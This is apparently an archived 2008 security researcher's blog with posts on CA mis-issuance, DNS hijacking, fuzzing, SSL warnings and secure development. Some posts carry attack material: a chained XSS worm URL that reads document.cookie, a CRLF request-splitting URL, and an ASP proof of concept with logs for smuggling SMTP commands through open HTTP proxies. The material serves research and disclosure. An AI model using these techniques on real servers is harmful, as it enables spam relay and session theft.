Wednesday, December 31, 2008

More than one way to skin a CA

Alex Sotirov, Jacob Appelbaum, and crew did some awesome work. They showed that it was possible to exploit RapidSSL's use of MD5 for signing certificates in order to create their own rogue CA signing certificate. This exploitation is many orders of magnitude more severe than when I used a loop hole to get the login.live.com certificate from Thawte.

So what should happen when a CA screws up? Last summer, folks thought that the CA which issued the login.live.com certificate should have its status as a trusted CA revoked. I'm sure people feel the same way about RapidSSL. In my opinion, they are correct. However, it is clear that this could not happen, as it would effect the millions of businesses that rely on these CAs being trusted, which is what a VP at Verisign reaffirms in the comments of this post.

A different question that Appelbaum asked during the presentation in Berlin, and one I've asked many times during my research of Certificate Authorities, is: if we were able to do this, how do we know if anybody else has done the same thing?

No one can ever give a straight answer. I've reported a number of flaws to CAs responsibly; flaws that can allow people to get certificates that they shouldn't be allowed to get. The flaws get fixed, and thats great, but the damage that could have already been done is immeasurable.

It sucks when an online retailer gets hacked one or even multiple times. It's bad for them, and it's bad for their customers. When a trusted CA gets hacked, it sucks for the ENTIRE INTERNET. The CAs are supposed to help us secure the Internet. What does it mean if they are not secure themselves? To me, it means that we can't rely on trusted third parties.

I know that abandoning PKI and trusted third parties is a bad idea, and probably won't happen. However, people need to be more involved in the process of making trust decisions when communicating online. And I don't mean little yellow locks and green address bars. I have some ideas on how to make better use of SSL in web browsers and other SSL clients. So far, I've gotten mixed responses to them from my peers :-) However, with what the Sotirov/Applebaum team accomplished, maybe my ideas will make more sense. Stay tuned...


(Cross post on PhishMe)

Tuesday, December 9, 2008

You don't need to be a hacker to abuse DNS

This morning I woke up, took a shower, and went straight to my laptop to let everyone on Twitter know that I had made it through another night, and had even decided to bathe. Unfortunately for me and my loyal followers, Optimum online had some tricks up its sleeve. It seemed that my DNS servers could not resolve www.twitter.com or twitter.com. Hmm. Check out Google. It's up. CNN? Up. Log on to EVDO, Twitter is fine. What the heck?

This DNS error was not like any I was used to seeing. I wasn't getting a vanilla browser message saying the page could not be displayed. No, I was getting an Optimum branded page telling me that the "domain could not be found." Fortunately, the page offered me a variety of SPONSORED and pay-per-click links that I could burn some time clicking on. Of course, when you follow the links that actually go to Twitter, DNS still would not resolve, and I'd end up on the same "domain not found page," where I could click on more links and generate more cash for Optimum online.

Optimum better shape up. Fios is in town now, and I don't like it when my ISP earns cash if their DNS servers screw up. Let alone the thought that they could intentionally force DNS glitches in order to generate some fast cash via sponsored links. What a racket!

Lets not forget about the bad habits this teaches end-users. "The server you were looking for cannot be found, so here click on these links instead." I can't wait until I see a message like that on my banks web site!

Who thinks ISPs would not stoop so low as to launch DNS attacks against their own customers? As far as I'm concerned, thats what Optimum did to me.

Friday, December 5, 2008

CheckFree.com owned; SSL, little yellow locks surrender.

A Washington Post blogger reports that the CheckFree.com domain name was hijacked. CheckFree is an online bill pay solution which many banks use to provide customers with a convenient method of making payments online. Apparently, attackers took control of the domain name by obtaining Check Free's credentials for their domain registrar account at Network Solutions. They were able to simply change the name servers for CheckFree.com (as well as any other Check Free domain), and all users would be redirected to attacker controlled web servers hosting malware and self-signed certificates.

On SlashDot, one person mentions that they were served a self-signed certificate when they clicked through to CheckFree from their bank. This attack could have been even nastier if the attackers had procured a legit CA signed certificate. Maybe the Network Solutions credentials also worked for CheckFree's EquiFaxSecure/Geotrust account (check out the cert for https://mycheckfree.com). If they had a valid cert and weren't hosting malware, who knows how long the hijacking could have lasted. All Check Free traffic could have been routed through the attacker servers in plain-text. Scary.

Friday, October 24, 2008

Fuzzing and MS08-67

Yesterday was pretty exciting. I'd been looking forward to it for quite some time, as it was my turn to lead the penetration testing/exploit dev class at NYU Poly. My subject for the class is fuzzing, and the first part consisted of a lecture on fuzzing history and methodologies followed by demos of COMraider, AxMan, and a video of an ActiveX exploit. I think the students are going to have some fun with ActiveX this week :-) Next week we'll be going over SPIKE in-depth.

What made the day more special was that I got to lead such a class while the rest of the infosec world was busy either patching MS08-67, or reversing it. This bug, found being exploited in the wild, ended up being a pre-auth stack overflow in a Windows RPC service. Precisely the kind of low-hanging fruit that Microsoft's SDL initiative, which includes fuzzing, was designed to stomp out. In fact, in a post-mortem write up by Michael Howard (the man behind SDL), he says:

"I'll be blunt; our fuzz tests did not catch this and they should have."

Howard doesn't go into detail about why fuzzing didn't work, which leads me to hypothesize the following:

1. The vulnerable function wasn't fuzzed at all.
or
2. The vulnerable function wasn't fuzzed correctly. According to the two Stephens, passing a string like \aaa\..\..\..\f is enough to trigger the overflow in the vulnerable function (which canonicalizes paths). The overflow occurs when there are not enough directories specified in the string to match the number of ..'s.

If the fuzzing engine used to test this function was not aware of the expected format of the string, it could have just passed in large string of A's, or perhaps a long string of random characters. Since such data would not be a valid path that requires canonicalization, the overflow would not occur, and would go undetected.

The lesson here is to think carefully about fuzzing strategies. It is not unreasonable to send a large string of static or random characters while fuzzing a target of an unknown code base. However, in this case we are talking about white-box fuzzing, since MS was fuzzing their own code. The fuzzer should have been given some knowledge of the data expected by the function. It would have been trivial to create fuzz strings of mangled and malformed paths that would have triggered this bug. The problem is simply that this didn't happen (atleast, not when MS fuzzed it).

Thursday, September 11, 2008

The no-exploit exploit

Dean wrote a cool post on how to drop and run .EXE's on a client just by getting them to view a web page in Internet Explorer. Yay ActiveX!

The link: http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html

Tuesday, September 2, 2008

Itunes and Vague SSL Error Messages

After reading Dans' recent blogs, I started poking around and checking out how some other non-browser SSL clients handle invalid certificates.

First up, ITunes. I fired up TSeeP with a self signed certificate, and started MITMing phobos.apple.com. The result:



Hmm. Pretty vague. Error -9812.

Next, I tried my trusty revoked login.live.com cert, just to see what would happen. The revoked certificate generated:



Error -9808. Another vague one. Ok, lets Google "itunes 9808".

First hit: http://soccerislife8.blogspot.com/2008/02/itunes-error-9808.html
That page tells you to follow another link to: http://techupdate.blogvis.com/2008/02/09/itunes-error-9808/

The second link is where the "fix" for error 9808 is. From the blog post:
Also under Security make sure that the “Check for server certificate revocation (requires restart)” is unchecked. Then click ok and fire up iTunes.

One of the many comments:
I had the same problem and unchecked the “Check for server certificate revocation (requires restart)”.

It works. Thank You.

According to the comments, there are a number of folks who might come across such a vaguely worded error message, look to Google for help, and follow these instructions without a second thought that they could be degrading their own security.

In short, if you're responsible for an application that acts as an SSL client, it is not enough to just perform certificate validation. When certificates turn out to NOT be valid, you need to act appropriately, prevent the connection, and WARN the user.

A better version of the Itunes invalid cert messages:

"SECURITY WARNING: There has been a problem validating the identity of an Itunes server. If you are using a public network, please connect to the Internet over a trusted connection such as your home or office network, and try again. If problems persist, reach out to your technical support contact for your Internet connection."

Monday, August 25, 2008

Domain Validated SSL Certificates

Regarding the SSL certificate I procured from a major Certificate Authority, the following two points would have helped prevent the issuing of the certificate.

1. An automated connection outbound over SSL to login.live.com (using a secured DNS server).
If this was done, it would have been obvious that the domain already has a valid, non-expired certificate. Why would Microsoft need another one? This should have thrown a red flag.

2. Actual domain validation (DNS poisoning was not used).
WHOIS information was simply disregarded. It also appears that it was a person who messed up, not necessarily a system. Awareness training is always a good thing. The scariest part was that people I spoke to on the phone saw nothing wrong with what I was requesting.

I don't want to name the CA who messed up - that won't help anyone.

I will, however, give props to a CA who did a great job. It may have just been one guy there who saw the badness, but he promptly called me with a loud and direct WTF?!

"There is no way we can give you that certificate", he told me. Way to go Digicert!

Tuesday, August 19, 2008

Strydehax the Olympics!

My buddy strydehax put a couple of hours into investigating the controversy surrounding the age of Chinese gymnasts. Check it out here.

NYSEC, OWASP Chicago

I'm off to NYC for NYSEC tonight, and tomorrow I'm off to Chicago for some work and some play. I was originally going to Chicago to hang out with my buddy, but coincidentally, there is a local OWASP chapter meeting on Thursday. Even cooler is that Rohyt had been scheduled to speak there, so I also get to go show some support for Intrepidus.

In other news, I'm finally starting to get caught up with work and back in the swing of things after Vegas. I'm continuing with more SSL VPN research, as well as some generic SSL research to follow my live.login.com stunt. Unfortunately, I have more ideas than I have time to research them.

Thursday, August 7, 2008

SSL VPN Slides - BlackHat 2008

Yesterday I delivered my presentation on web based SSL VPN security at BlackHat in Las Vegas. The slides can be viewed here.

Thanks to all who attended my presentation. I'll be writing a paper soon to highlight the major points, so stay tuned for that.

Wednesday, July 2, 2008

Thoughts on IE8

I read quite a bit of stuff on the IE8Blog today. Most interesting to me are the improvements surrounding ActiveX controls. Among the big changes here are Per-User (non-Admin) controls and Per-Site Controls.

Per-User Controls are installed by standard users without the need to elevate privileges. Administrative rights will no longer be required because the control will only be exist within the profile of the user who installs it, preventing exploitation of other users of the system.

More importantly, Per Site controls allow users to white list certain sites to use certain controls. This is a great break through in the fight against ActiveX re-purposing attacks, where malicious web sites abuse functionality in legitimate controls. Where security conscious developers once had to maintain their own white-listing code within the control, IE8 will do this for them by default.

This is great for complex web applications (like SSL VPNs) that use ActiveX controls to perform sensitive/dangerous actions on the client. Unfortunately, there are still many organizations out there that haven't even embraced IE7 yet, so these defenses may not help the users who really need them for quite some time.

On the XSS front, IE8 will also have a few new tricks. One of them is a client side black-list XSS filter (like a wimpy NoScript) that will block attacks and notify users. Unfortunately, to avoid "breaking the web", it appears from this post that the filter will only block the most obvious SCRIPT tag injections.

Another new feature is the toStaticHTML() JavaScript method. This looks like another blacklist, but is intended to allow a web site to render third-party Web2.0 content safely in the browser. Hopefully it uses a robust black list!

Another new feature that I'm really excited about is domain highlighting. In order to prevent phishing and other social engineering attacks, IE8 will highlight what it determines to be the owning domain name in the address bar. Anything site controlled, like sub-domains and URL text, will be grayed out, so that the user can more easily key in on the important parts: the protocol and domain name. Simple, but effective.

Thursday, June 19, 2008

Recent OWASP Events

Last week I presented at FROC.us and my demos worked fine. Last night at the OWASP NY/NJ chapter meeting my demos failed hard! Fortunately for me, everyone was very nice and understanding, and the presentation was able to hold its own without the demos. Thanks for everyone who came out to both of these events!

You can view my slides here:


FROC.us - SSL VPN Security (different from what I'll be presenting at BlackHat)

June 18 2007 OWASP NY/NJ - Reverse Proxy Abuse

Here are videos of the demos I tried to show last night:
Abusing XMLHTTP for local resource access
Exploiting 5 WebApps with 1 HTTP Request

I had some resolution issues that prevented me from getting them up on YouTube, but I'll try again later when I have more time.

Thursday, June 5, 2008

CAPTCHAs anyone?

Man Allegedly Bilks E-trade, Schwab of $50,000 by Collecting Lots of Free 'Micro-Deposits'

Talk about abuse of functionality! Doesn't look like this guy did much to fly under the radar either. He was opening THOUSANDS of accounts per day with these brokers. In some cases, he even linked fraudulent accounts and accounts opened with his real personal details to the same bank account.

The best part, in my opinion, is that he did the same thing the Google checkout service, seemingly within their terms of service:

"When the bank asked Largent about the thousands of small transfers, he told them that he'd read Google's terms of service, and that it didn't prohibit multiple e-mail addresses and accounts. 'He stated he needed the money to pay off debts and stated that this was one way to earn money, by setting up multiple accounts having Google submit the two small deposits.'

The Google caper is not charged in the indictment. (.pdf)"

Monday, June 2, 2008

[insert interesting title here]

I guess you could tell by my lack of posts that I've been pretty busy recently. Fortunately, it's been mostly with fun and interesting things.

One of the projects I've been working on is reversing a patched SSL VPN ActiveX component in preparation for my BlackHat talk. I've been staring at Olly and IDA until my eyes feel like their going to bleed. But, I've been making progress, learning a lot, and I've come up with some additional material to talk about. One such topic is that of hard coded passwords in binaries. Jeez. If you work for a security product vendor, you should know better!

I've also been getting ready for my first SSL VPN talk next week at Froc.us. I have some cool stuff to share with those folks, and it should be a good time. Plus, I've never partied in Denver before. Looking forward to seeing a new city.

Friday, May 16, 2008

Black Hat USA 2008

I have some exciting news. Well, exciting for me anyway :-)

I was accepted to speak at Black Hat 2008 this summer in Las Vegas. You can read my abstract here. I'm in the network track (since I'm talking about SSL VPN) but rest assured there will be a ton of application security content in my talk.

A lot of big names in the security space will also be speaking there, and it's an honor to be included among them.

Wednesday, May 14, 2008

Changing target landscapes

Dancho Danchev asks if the recent mass SQL injection attacks are intended to steal databases from vulnerable sites, or if they are being used to build a network of compromised hosts for later attacks. I would just assume that an intelligent attacker would do both

As popular targets harden, attackers will adapt and look for ways to exploit less popular targets en masse. While it may have been easy a few years ago to compromise one valuable target, today it might be easier (and safer) for an attacker to compromise 100 smaller targets and get the same value.

As the target landscape changes, attacks and tool kits will mature, making it easier to automatically compromise sites using a wide range of vulnerabilities. A few years ago, we had big compromises at large organizations like TJ Maxx. Today, we see more attacks targeted at smaller organizations, like the most recent one I know of at multiple locations of a popular restaurant chain in the states.

In the same way new and expensive technologies trickle down from the largest companies that can afford them, the attackers will trickle down from the hardened juicy targets to the smaller and softer, yet more prevalent, targets.

Tuesday, May 6, 2008

A Dynamic Approach to Static Analysis

The following is intended for people who want to do things differently, and see an improvement in the security of their web applications. If you are looking for an acronym and a quick fix to get insecure code fast-tracked into production so you get a bigger bonus, go here.

The problem with static analysis tools is not false positives. It's also not getting code to compile, or integrating source code scanning into the nightly/weekly/monthly build process. These are limited, one time challenges that can be overcome with a few days, sometimes just hours, of work by a capable individual.

In my opinion, the problems that hamper the success of static analysis tools are:

1. Management sees source code scanning as a panacea, and lacks an understanding of the business process changes needed to support static analysis in a large development organization.

2. Developers are often not trained to fully understand the findings the tools provide, and are not given the resources and education required to fix bugs or alter bad development practices.

Management likes to know about the badness in their apps, and the pretty graphs and reports that the tools can generate make them feel like they have a handle on things. Unfortunately, the 1500 cross site scripting vulnerabilities in the report won't disappear unless the developers have time to fix them.

Making the vuln's disappear from the chart might make management feel warm and fuzzy, but if they are merely obfuscated such that the tool doesn't see them, everyone is even worse off then before. That's why it's important that your developers know how to properly fix the problems. A black-listing routine may trick your static analysis tool, but it won't trick a pen-tester - or an adversary.

The first time you scan your code and find that you have a gazillion cross site scripting vulnerabilities, your first priority should not be to put the static analysis tool on everyones desktop, or to configure nightly automated scans. If you want to make some serious improvements to your code base, try following these three steps:

Step One - Get Help
Hire a security architect - or bring in a consultant - to help you understand how the security issue effects the application has a whole, as opposed to individual lines of code. When you realize that the application fails to properly sanitize input across the board, you can develop remediation plans that solve this problem across the board (like secure APIs).

Step Two - Get Resources
Make management aware of the problem and how it is costing them money. Exploit vulnerabilities in the application in front of them. Show them how YOU can hijack THEIR account. When you do this, you need to also describe your remediation plan, and let them know the resources you need to make things right. Show them how efficiently you can standardize input validation using a secure API. Your consultant or architect should be able to help you here. If not, get a new one!

Step Three - Get Results
Once management has eagerly met your demand for resources, train your developers. Exploit the same vulnerabilities in front of them that you showed management, but also show them where the problem exists in the source code. Show them how easy it is to fix each vulnerability with the secure API! Send them off to review and fix their own code. Follow up with a static analysis scan in a week or two.

After your first round of step three, you should see a sharp decline in the number of vulnerabilities. Let your developers know the good news, and keep repeating step three until input validation problems are a thing of the past!

After that, you can focus on things that static analysis tools are not good at finding - like access control issues in your business logic.

Friday, May 2, 2008

Transloading? WTF!

Some research I've been doing led me down an interesting path. The path of the WebTV user (or Webbie). I've never used or seen a WebTV, but I've come across a number of sites the past few days that INSIST I browse them from a WebTV or they will not let me in :-)

Anyway, the sites I've been Exploring are called "transloading" sites. Transloading is when you tell ServerA.com to fetch a URL from ServerB.com, and store it on ServerC.com. WebTV users need this, I presume, because either they can't store files locally and then upload them, or it is just a big PITA.

The fetching part is the normal application/proxy stuff I usually rant about. The storage part is a little more interesting. All of these site request an FTP host, user name, password, if you wish to rename the file, and sometimes even a desired permission level to set on the new file. Forget about the fact that none of them use SSL when transmitting these credentials. Forget, again, that this type of site reinforces bad habits that lead to people getting phished.

The scariest part is that some of these sites are also pretty good at spitting out the command line results when they attempt to FTP to your specified host. There seems to be some pretty obvious command injection vulnerabilities in many of them. So even if your a shrewd "webbie" (no homo) who trusts the person hosting the transloading script, their box could easily be compromised and your ftp creds are being harvested by someone else.

Many of the transloading sites actually seem to use the same CGI script to do their job. I haven't been able to locate a copy of this script, but I haven't tried too hard to find it either. If you want to know more about transloading, checkout Beth's site

Tuesday, April 15, 2008

Worm-like Intranet/Proxy Hacks

Remote file include worms are nothing new. Santy worm, for example, abuses PHP applications that allow user specified locations to be passed to require() and include() functions. When attacker controlled URLs are passed to these functions, the attacker can serve code to the application which will then be executed on the victim server.

Intranet hacking vulnerabilities, like the one RSnake recently found, share some characteristics of these vicious PHP application flaws. Both flaws take user specified resources and fetch them automatically without any validation. This means you can tell the application to go get http://www.cnn.com, or http://localhost/app/web.config, and the application will generate an HTTP request for that resource.

What sets the two issues apart, is that the PHP vulnerability consists of an automated request AND arbitrary code execution - that's why it is so easily wormable. Intranet-hacking type vulnerabilities, in general, only provide an attacker a method to automate and proxy requests (propagation), without any vector for remote code execution. Unless, there is some other vulnerability in the same script...

If in the same URL that has the arbitrary request vulnerability, there is a persistent XSS/SQL injection/command injection vulnerability, you now have a vector to execute malicious code, as well as a method to propagate it.

Below is one theoretical example. But first, lets get some assumptions out of the way :-)

Assumption 1: The application has a pre-auth vulnerability allowing users to specificy URLs which the application will fetch without validation.

Assumption 2: The same code that doesn't validate the user specified URL also doesn't validate other querystring data it is sent.

Assumption 3: All querystring data gets written to a log or database, without being encoded, where it can be viewed in a web browser by an administrator or some privileged user.

Initial attacker generated request:
http://somewebapp/app/fetch?path=[URL]&XSSpayload=<script>alert(document.cookie)</script>

In the above request, [URL] = http://someotherwebapp/app/fetch%3Fpath%3D[URL2]%26XSSpayload%3D<script>alert(document.cookie)</script>

[URL] contains the first automated request that will be generated, [URL2] contains the next one, and so on . . .

Another differentiator is that while the malicious PHP worm code can find targets on its own using Google searches, with Intranet hacking it is up to the attacker to identify targets and build his exploit URL. In the end, he'll have a very long URL that contains the target and payload for every server you wish to attack. Not pretty, but it should get the job done.

Something else to be aware of is how the execution path of the victim code. When the code makes the remote request, it will probably hang until it gets a response, or until it times out (depending on how many requests are made and how long it takes for them to be fulfilled).

If, in our above example, the persistent XSS is written to the database before the request is made, your attack should still work. If it is written to the database after the HTTP request, you could be out of luck if the request times out and the code takes an alternate execution path.

Again, this is all theory. Next step would be a PoC . . . or maybe actually find something like this in the wild.

Monday, April 14, 2008

TCP MITM Tools

I wrote a post on the PhishMe blog about a tool I'm building. Check it out here.

It's basically a TCP proxy that allows you to intercept/modify all application traffic sent via TCP and SSL, regardless of application protocol (HTTP/SOAP/proprietary stuff). It has helped me out quite a bit on some projects, so I'm curious to see if the rest of the world will find it useful!

Thursday, April 10, 2008

Front Range Web Application Security Summit

On June 10th, I'll be speaking in Denver at the Front Range OWASP Web Application Security Summit. My topic will be abusing SSL VPN client/servers and open reverse HTTP proxies. I'll be talking about a lot of what you've read here, as well as demo some POCs and exploits. Check it out here: http://www.froc.us

Also on the bill are Jeremiah Grossman, RSnake, and Ed Bellis, a CISO for Orbitz World Wide. Looks like there will be a wide range of interesting tech and management subject matter!

Tuesday, April 8, 2008

Preventing BlackHat Automation

Yesterday on PhishMe, I talked about my trip to Chicago to visit my good friend Sachin. While out there, we hung out with his buddy John who works for a small web design firm. John's firm sells quite a few e-commerce sites, and he had an interesting tale of a DoS attack against one of their client sites.

Except, DoS wasn't the intended purpose of the attack. The attackers were actually abusing the web application to scrub a list of credit cards in order to figure out which ones were good. The DoS occurred when Authorize.NET stopped accepting transactions from the site, preventing legit customers from making purchases.

Their immediate solution was to block the offending IP which stopped the attack. But the vulnerability still existed in the application, so they put in further validation, the details of which we didn't really get into.

I made the argument that no matter what kind of validation you put in place, you still need to let anonymous users place orders with credit cards. Additionally, you can't effectively block malicious users from placing an infinite number of orders because:

1. Malicious users can utilize open proxies, preventing IP filtering.
2. Malicious users can utilize multiple identities and credit card numbers, so you can't just block John Q. Hacker.
3. Limits on sessions won't help, since attackers can just get new session tokens.

John pretty much agreed, and added that they now have an added sense of vigilance and more actively monitor usage of their sites. Unfortunately, this monitoring is all done manually, which doesn't make for a scalable solution.

Monitoring, both manual and even automated, is also only effective against stupid attackers who don't throttle and/or don't make an effort to make their HTTP requests look legit. A savvy attacker should be able to randomize the time between his automated requests, as well as automatically utilize a large number of open proxies to hide his true intentions. If the attacker does some homework and determines the number of legitimate orders a given web site handles per day, he should be able to throttle his requests such that no red flags will be raised.

Below is a list of possible countermeasures that could be deployed to prevent such abuse and automation.

1. Make the attacker, but not browser based users, jump through hoops. Enforce strict HTTP request validation on critical transactional URLs. Make sure any header a normal browser would send is present in the request.

2. Reverse CAPTCHA. Build a response that a human can understand, but would be difficult for an automated bot to interpret. Show a picture of some dogs, and display a message to the effect of: "If you see 3 golden retrievers in this picture, your order was successful."

3. Use alternate communication channels for response data. An easy one would be to SMS the transaction result to a mobile number. Of course, you can't rely on all users being able to receive SMS...

4. Use a combination of numbers two and three, and make your process dynamic.

There are two themes to these countermeasures:
1. Make your process complicated to automate.
2. Make your responses hard to interpret programatically.

And one last idea. If you're content with monitoring for the time being, you still need to be able to react when you see someone doing something naughty. In the case of credit card validation abuse, an easy countermeasure would be to easily disable real time processing. Your site will still be accepting orders, but they won't be processed until after human review.

Monday, April 7, 2008

Go PhishMe!

I've started writing on the PhishMe.com blog. You can read my first post here.

I'll still be writing on Schmoilitos Way, but I'm going to be writing about some new tools I'm developing on the PhishMe blog, so definitely keep an eye on it. The other guys on the Intrepidus team also have some really interesting/relevant/fun stuff to write about, so I'd recommend adding it to your feeds!

Cheers!

Friday, April 4, 2008

Defending your visitors

Last night I was hanging out with my friend Andy, who is a real estate agent here in Hoboken. I was shocked when he told me he read my blog, and blown away when he said he got some value out of it!

While not a tech guy, Andy handles most of his computer issues on his own. He also runs a simple web site he developed to promote his real estate listings. He is looking to add functionality to his site, and he found some individuals on guru.com who are bidding for the work. While his current web site and the work he needs done is not overly complicated, my last post (Outsourcing Pain) still struck a nerve with him.

Andy realized how easily he, his web site, and people who view his web site, could be taken advantage of by some mystery outsourcer. He still needs help getting his work done, but he will be a little more vigilant in choosing who does it for him.

One of the features Andy wants implemented in his site is form validation on some of his contact forms that users can fill out. I told him to make sure when he pays someone to do it, that they give him server side validation as opposed to client side JS validation. I gave him the usual appsec drill about injection attacks, and how no validation leads to compromised assets (data, server, etc). This lead us to another great point in our discussion.

Andy asked: "What assets do I have? Why would anyone want to hack my rinky dink real estate web site?"

If Andy's web site was pwned, it wouldn't be a big hit to his wallet. It's not a major source of business for him. However, the people who view his web site - current and would-be customers - probably use their PC's for more then just browsing Andy's web site. They use it to check email, bank online, work, and all that good stuff.

So while hackers might not want to steal Andy's database, they would be more than happy to take control of his site in order to serve malware to his visitors and spam the rest of us with viagra emails and the like. The assets Andy's web site puts at risk may not necessarily be his own. A compromise of his site could lead to much frustration for his visitors, but not necessarily Andy himself.

Wednesday, April 2, 2008

Outsourcing Pain

I have some friends who own a small business together and are going through some outsourced development trouble. The business originally started with one owner in the U.S. and an outsourced Eastern block nation developer responsible for all architecture and development. Together, they built a robust web app that was great for its intended purpose, and quite pleasing to the eye. The two had a great relationship, albeit one based on no more than a virtual hand shake.

Things started to get sketchy when the owner, realizing he could only take the business so far, brought in partners and gave away equity. With the new partners involved, the original relationship with the developer started to sour. The developer responded by working directly for clients, raising his rates, and making him self scarce.

FUD

They asked me what the worst-case scenario would be if the relationship soured to the point where they no longer worked with this developer. They assumed he could take the source code, his knowledge of the source code, and start a competing firm. Since he is in a foreign country, and they have no written agreement at all, the partnership would be S.O.L. That is bad news.

While the above is true, I told them the really bad news. Since he is the only one who understands the code and was the sole person responsible for managing it, it would be good too assume that he knows backdoors into the app where he can steal sensitive client data. They wondered why this is a "good" assumption. I explained that it is a good assumption because they have a chance to be proactive about it.

Take Back Control

The first thing they need to do is get a handle on the source code. They need to maintain a source code repository and make the outsourced developer use it. Once they have the source, they need to get a security consultant to review the code for security problems. Expensive, but necessary. Finally, they need to either formalize the relationship with this outsourcer or plan on moving to someone else.

In hind sight, it is easy to see how all eggs were in one basket. Since all design, architecture, and coding was done by the outsourced resource, there was no internal knowledge of how the application actually worked. The developer had all the control. A simple solution would have been to hire one more outsourced resource, and split the workload between the two. This would have allowed an additional technical resource to develop over time, providing the owner with some stability in case the secret police came in the night and took the primary developer away.

For Next Time

If an individual were to ask me for advice on initiating an overseas outsourced development project, here are some tips I would give them.

1. Go with a legit company. Don't just pick some guy off rent-a-coder who you can only contact via IM and email. If you want a long term relationship, you will want to be able to speak with them.

2. If possible, go with a company that has a presence in your country. Not only does this mean you have someone to speak with during your own business hours, but you have someone you can more easily hold legally responsible if things don't work out.

3. Make sure the developers document their code.

4. Have a contingency plan if things don't work out. Try and establish a relationship with another development firm, or be prepared to hire an internal resource. Outsourcing can be a great value, but having an in-house resource can be invaluable.

5. Understand that security is important. Non-technical people can come up with great ideas for software. Unfortunately, when they have someone develop it, they look for functionality and turn a blind eye on security (actually that sounds like a lot of technical people I know). Before you begin your project, check out OWASP, and at least talk to someone about application security - a friend, a consultant - anyone knowledgeable.

6. When you begin testing the application internally, pay a third party to perform a security assessment of it. This way you can report security issues to the developers in addition to the functional bugs you will be finding and reporting. It is more dollars up front, but it will be worth it in the long run. The sooner you address security, the cheaper it will be.

There are probably alot more points that I don't address above. If you have any advice for people with a great idea for an app and are looking to take advantage of outsourced development, feel free to post in the comments.

Thursday, March 27, 2008

Smuggling SMTP through open HTTP proxies

We know that Intranet port scanning through open proxies in web apps can lead to information disclosure (leaking what servers are listening on what ports) and even unauthorized access to HTTP applications that are not exposed to the outside world. What I've been trying to figure out over the past couple of days is how much damage can you do to non HTTP applications, like SMTP/POP/FTP/etc. I've come to a few interesting conclusions.

To put it simply, what we are able to do in this situation is open a TCP socket between the web server and the target server, and send the target server an HTTP request. Depending on how the target handles the request, it could keep the socket open or close it immediately. In the case of a connection left open, your web browser/client will hang while the web server also hangs waiting for a proper HTTP response from the target. Eventually, the web server or the target will close the connection and the web server will send a response back to you. If the target closes the connection immediately, you will get an immediate response from the web server.

My goal is to get the target service to actually consume and interpret parts of the HTTP request sent by the web server. In my testing, I focused on SMTP, and I did this for two reasons. First, I already had an SMTP server running. Second, this would be a great way for spammers to hijack open SMTP servers that aren't directly exposed to the internet.

I started testing on Windows Server 2003 first. After sending an HTTP request and looking at the SMTP server logs, it was obvious what was happening. The SMTP server thought each line ending with \r\n was a command, and it generated appropriate errors (500). See below log example:

#Software: Microsoft Internet Information Services 6.0

#Version: 1.0

#Date: 2008-03-26 19:18:06

#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 get - +/+HTTP/1.0 500 0 32 24 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 accept: - +*/* 500 0 32 11 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 referer: - +https://spoofedreferrer 500 0 32 84 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 ua-cpu: - +x86 500 0 32 11 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 user-agent: - +Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727) 500 0 32 106 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 host: - +192.168.1.2:25 500 0 32 24 0 SMTP - - - -

2008-03-26 19:18:06 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 connection: - +Keep-Alive 500 0 32 22 0 SMTP - - - -


When I sent this request, the connection stayed open and my browser hung until I restarted the SMTP service. As you can see from the log, the SMTP server looked at each line of the SMTP request as a command. If you can control the HTTP headers of your request, you can send commands to the SMTP server. Control of the request headers can come in a number of ways.
1. Request splitting. Example: http://www.webserver.com/vulnProxy?url=http://smtp-server/ HTTP/1.1%0D%0AHELO smtp-server%0D%0AQUIT%0D%0A
2. Some proxies may take all the headers your client sends and include them in the proxied request.

Proof of Concept

SMTP SERVER LOG:
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-03-27 00:21:49
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 get - +/MAIL%0D%0A+HTTP/1.0 500 0 32 24 0 SMTP - - - -

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 accept: - +*/* 500 0 32 11 0 SMTP - - - -

2008-03-27 00:21:49 192.168.1.1 - SMTPSVC1 SERVERUPLINK1 192.168.1.2 0 QUIT - - 240 0 62 22 0 SMTP - - - -


ASP SCRIPT ON THE WEB SERVER:
<%
dim http

'set http = createobject("Msxml2.XMLHTTP.4.0")
'set http = createobject("Msxml2.ServerXMLHTTP.4.0")
set http = createobject("Msxml2.XMLHTTP")
'set http = createobject("Microsoft.xmlhttp")
'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")

http.open "GET", "http://192.168.1.2:25/MAIL%0D%0A", false
http.setrequestheader "QUIT xx","serveruplink1" '& vbcrlf & "EHLO"
http.send
response.write http.ResponseText
%>



HTTP RESPONSE FROM ASP SCRIPT:
HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 00:21:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 241
Content-Type: text/html
Cache-control: private


220 ServerUplink1 Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Wed, 26 Mar 2008 19:21:49 -0500
